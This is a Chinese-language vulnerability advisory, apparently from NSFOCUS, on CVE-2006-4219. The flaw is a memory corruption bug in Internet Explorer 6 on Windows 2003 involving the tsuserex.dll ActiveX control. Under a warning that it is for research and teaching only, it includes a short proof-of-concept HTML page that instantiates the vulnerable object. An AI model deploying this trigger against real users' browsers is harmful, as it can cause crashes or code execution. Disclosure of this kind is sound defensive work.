安全研究
安全漏洞
Microsoft Internet Explorer TSUserEX.DLL ActiveX控件内存破坏漏洞
发布日期:2006-08-17
更新日期:2006-08-29
受影响系统:Microsoft Internet Explorer 6.0 SP1
描述:
BUGTRAQ ID:
19570
CVE(CAN) ID:
CVE-2006-4219
Internet Explorer,简称MSIE,是微软公司推出的一款网页浏览器。
Microsoft Windows 2003 EE SP1 CN上的Internet Explorer 6.0 SP1存在安全漏洞,Terminal Services COM对象(tsuserex.dll)允许远程攻击者将其实例化为ActiveX对象,造成拒绝服务或执行任意代码。
<*来源:nop (
nop@xsec.org)
链接:
http://xforce.iss.net/xforce/xfdb/28444
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
=============== tsuserex.dll.htm start ================ <!-- // Microsoft Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability // tested on Windows 2003 EE SP1 CN //
http://www.xsec.org // nop (nop#xsec.org) // CLSID: {E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29} // Info: ADsTSUserEx Class // ProgID: tsuserex.ADsTSUserEx.1 // InprocServer32: C:\WINDOWS\system32\tsuserex.dll --!> <html><body> <object classid="CLSID:{E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}"> </object> </body> </html> =============== tsuserex.dll.htm end ==================
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp浏览次数:1982
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
